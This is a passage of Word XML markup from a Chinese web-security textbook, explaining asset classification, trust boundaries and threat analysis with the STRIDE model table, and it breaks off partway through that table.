          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>一般来说，按照这个过程来实施安全评估，在结果上不会出现较大的问题。这个实施的过程是层层递进的，前后之间有因果关系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>如果面对的是一个尚未评估的系统，那么应该从第一个阶段开始实施；如果是由专职的安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>全团队长期维护的系统，那么有些阶段可以只实施一次。在这几个阶段中，上一个阶段将决定下一个阶段的目标，需要实施到什么程度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1052" w:val="left" w:leader="none"/>
          <w:tab w:pos="1053" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="1052" w:right="0" w:hanging="849"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250009" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>资产等级划分</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="494" w:lineRule="exact" w:before="23"/>
        <w:ind w:left="604" w:right="187"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>资产等级划分是所有工作的基础，这项工作能够帮助我们明确目标是什么，要保护什么。我们前面提到安全三要素时，机密性和完整性都是与数据相关的，在可用性的定义里，笔</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="319" w:lineRule="auto" w:before="42"/>
        <w:ind w:left="203" w:right="221"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>者则用到了“资源”一词。“资源”这个概念描述的范围比数据要更加广阔，但很多时候，资源的可用性也可以理解为数据的可用性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="319" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>在互联网的基础设施已经比较完善的今天，互联网的核心其实是由用户数据驱动的——用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>户产生业务，业务产生数据。互联网公司除了拥有一些固定资产，如服务器等死物外，最核心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>的价值就是其拥有的用户数据，所以——</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:ind w:left="606"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>互联网安全的核心问题，是数据安全的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="319" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="187" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>这与我们做资产评估又有什么关系呢？有，因为对互联网公司拥有的资产进行等级划分， 就是对数据做等级划分。有的公司最关心的是客户数据，有的公司最关心的是员工资料信息， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>根据各自业务的不同，侧重点也不同。做资产等级划分的过程，需要与各个业务部门的负责人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>一一沟通，了解公司最重要的资产是什么，他们最看重的数据是什么。通过访谈的形式，安全部门才能熟悉、了解公司的业务，公司所拥有的数据，以及不同数据的重要程度，为后续的安全评估过程指明方向。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="319" w:lineRule="auto" w:before="151"/>
        <w:ind w:left="202" w:right="125" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>当完成资产等级划分后，对要保护的目标已经有了一个大概的了解，接下来就是要划分信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>任域和信任边界了。通常我们用一种最简单的划分方式，就是从网络逻辑上来划分。比如最重要的数据放在数据库里，那么把数据库的服务器圈起来；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>应用可以从数据库中读</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>写数据， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>并对外提供服务，那再把 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>服务器圈起来；最外面是不可信任的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="319" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="2689"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2028651" cy="1772126"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="image7.jpeg" descr="cid:image015.png@01CCEFE2.AFB05CC0"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="12" name="image7.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2028651" cy="1772126"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="75"/>
        <w:ind w:left="0" w:right="17" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>简单网站信任模型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="319" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>这是最简单的例子，在实际中会遇到比这复杂许多的情况。比如同样是两个应用，互相之</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>间存在数据交互业务，那么就要考虑这里的数据交互对于各自应用来说是否是可信的，是否应该在两个应用之间划一个边界，然后对流经边界的数据做安全检查。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1052" w:val="left" w:leader="none"/>
          <w:tab w:pos="1053" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1052" w:right="0" w:hanging="849"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250008" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>威胁分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="210"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>信任域划好之后，我们如何才能确定危险来自哪里呢？在安全领域里，我们把可能造成危</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>害的来源称为威胁（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>rea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-97"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>，而把可能会出现的损失称为风险</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-99"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>。风险一定是和损失联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>系在一起的，很多专业的安全工程师也经常把这两个概念弄混，在写文档时张冠李戴。现在把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>这两个概念区分好，有助于我们接下来要提到的“威胁建模”和“风险分析”两个阶段，这两个阶段的联系是很紧密的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="152"/>
        <w:ind w:left="203" w:right="219" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t>什么是威胁分析？威胁分析就是把所有的威胁都找出来。怎么找？一般是采用头脑风暴</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>法。当然，也有一些比较科学的方法，比如使用一个模型，帮助我们去想，在哪些方面有可能会存在威胁，这个过程能够避免遗漏，这就是威胁建模。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="156"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在本书中介绍一种威胁建模的方法，它最早是由微软提出的，叫做 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>STRIDE </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>模型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>STRIDE </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>6 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>个单词的首字母缩写，我们在分析威胁时，可以从以下 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>6 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>个方面去考虑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="2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890"/>
        <w:gridCol w:w="2224"/>
        <w:gridCol w:w="1991"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="280" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3890" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:pos="465" w:val="left" w:leader="none"/>
              </w:tabs>
              <w:spacing w:before="36"/>
              <w:ind w:left="14"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>威</w:t>
              <w:tab/>
              <w:t>胁</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2224" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:pos="476" w:val="left" w:leader="none"/>
              </w:tabs>
              <w:spacing w:before="36"/>
              <w:ind w:left="25"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>定</w:t>
              <w:tab/>
              <w:t>义</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1991" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="36"/>
              <w:ind w:left="478"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>对应的安全属性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="280" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="107"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Spoofing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>（伪装）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2224" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="112"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>冒充他人身份</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1991" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="116"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="280" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="107"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Tampering</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>（篡改）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2224" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="112"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>修改数据或代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1991" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="116"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="277" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="107"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Repudiation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>（抵赖）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2224" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="112"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>否认做过的事情</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1991" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="116"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>不可抵赖性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="280" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="39"/>
              <w:ind w:left="107"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>InformationDisclosure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>（信息泄露）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2224" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
